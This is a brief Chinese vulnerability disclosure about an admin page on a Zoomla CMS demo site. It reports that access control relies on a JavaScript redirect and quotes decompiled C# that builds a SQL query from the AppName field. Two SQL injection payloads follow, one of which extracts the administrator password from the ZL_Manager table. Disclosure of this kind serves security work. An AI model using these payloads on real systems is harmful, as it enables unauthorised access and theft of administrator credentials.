### 简要描述:
某处越权,but有注入点。。。
### 详细说明:
http://demo.zoomla.cn/app/addTemplate.aspx后台管理,应用推送添加模板处。
js跳转,你能信?
app/addTemplate.aspx
```
%@ page language="C#" autoeventwireup="true" inherits="manage_APP_AddAPP, App_Web_cin4d2pk" enableEventValidation="false" viewStateEncryptionMode="Never" %>
看App_Web_cin4d2pk中的manage_APP_AddAPP关键代码:
if (base.Request.QueryString["ID"] != null)
{
this.model.AppName = this.TextAppName.Text;
this.bll.Update(this.model);//参数化查询...
}
else if ((this.TextAppName.Text.Trim() != null) && (this.TextAppName.Text.Trim() != ""))
{
if (this.bll.Sel("AppName='" + this.TextAppName.Text.Trim() + "'", "").Rows.Count > 0)//追了几层该函数,发现可以参数化查询的,调用的有问题
{
this.LblMessage.Text = "<font color=red>此应用名称已存在,请重新输入!</font>";
```
所以ID参数为空,在提交时,Appname存在注入。
### 漏洞证明:
AppName处填
' and @@version>0 and '1'='1
'and (select top 1 AdminPassword from ZL_Manager)>0 and '1'='1
请自测。
暂无评论